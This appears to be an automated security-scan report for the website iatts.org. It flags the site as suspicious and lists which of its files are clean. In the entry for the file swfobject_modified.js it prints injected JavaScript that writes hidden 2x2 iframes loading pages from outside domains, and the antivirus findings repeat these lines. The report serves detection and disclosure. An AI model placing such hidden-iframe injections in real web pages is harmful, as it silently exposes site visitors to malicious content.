Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=iatts.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://iatts.org/ | 200 OK Content-Length: 20193 Content-Type: text/html | clean |
http://iatts.org/Scripts/swfobject_modified.js | 200 OK Content-Length: 22201 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vippraiahotel.com.br/omaf.html?j=1247457></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://alicebangkokescorts.com/womd.html?j=1247457></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosepho var obj = getElementById(EXPRESS_INSTALL_ID); if (obj) { obj.parentNode.replaceChild(storedAltContent, obj); if (storedAltContentId) { setVisibility(storedAltContentId, true); if (ua.ie && ua.win) { storedAltContent.style.display = "block"; } } storedAltContent = null; storedAltContentId = null; isExpressInstallActive = false; } } } }; }(); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emas.html?j=1247457 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emas.html?j=1247457> Hidden iFrame found. size: 2x2 src: http://vippraiahotel.com.br/omaf.html?j=1247457 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vippraiahotel.com.br/omaf.html?j=1247457> Hidden iFrame found. size: 2x2 src: http://alicebangkokescorts.com/womd.html?j=1247457 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://alicebangkokescorts.com/womd.html?j=1247457> | ||
http://iatts.org/IATTS-About.html | 200 OK Content-Length: 14433 Content-Type: text/html | clean |
http://iatts.org/IATTS-Membership.html | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://iatts.org/test404page.js | 404 Not Found Content-Length: 515 Content-Type: text/html | clean |
http://iatts.org/IATTS-benefits.html | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://iatts.org/IATTS-contactus.html | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://iatts.org/index.html | 200 OK Content-Length: 20193 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: iatts.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 28 Dec 2014 03:37:16 GMT
Accept-Ranges: bytes
ETag: "13f611-4ee1-4fa66dcde6097"
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 20193
Content-Type: text/html
Last-Modified: Tue, 27 May 2014 19:40:06 GMT
...20193 bytes of data.
GET / HTTP/1.1
Host: iatts.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 28 Dec 2014 03:37:16 GMT
Accept-Ranges: bytes
ETag: "13f611-4ee1-4fa66dcde6097"
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 20193
Content-Type: text/html
Last-Modified: Tue, 27 May 2014 19:40:06 GMT
...20193 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: iatts.org
Referer: http://www.google.com/search?q=iatts.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: iatts.org
Referer: http://www.google.com/search?q=iatts.org
Result:
The result is similar to the first query. There are no suspicious redirects found.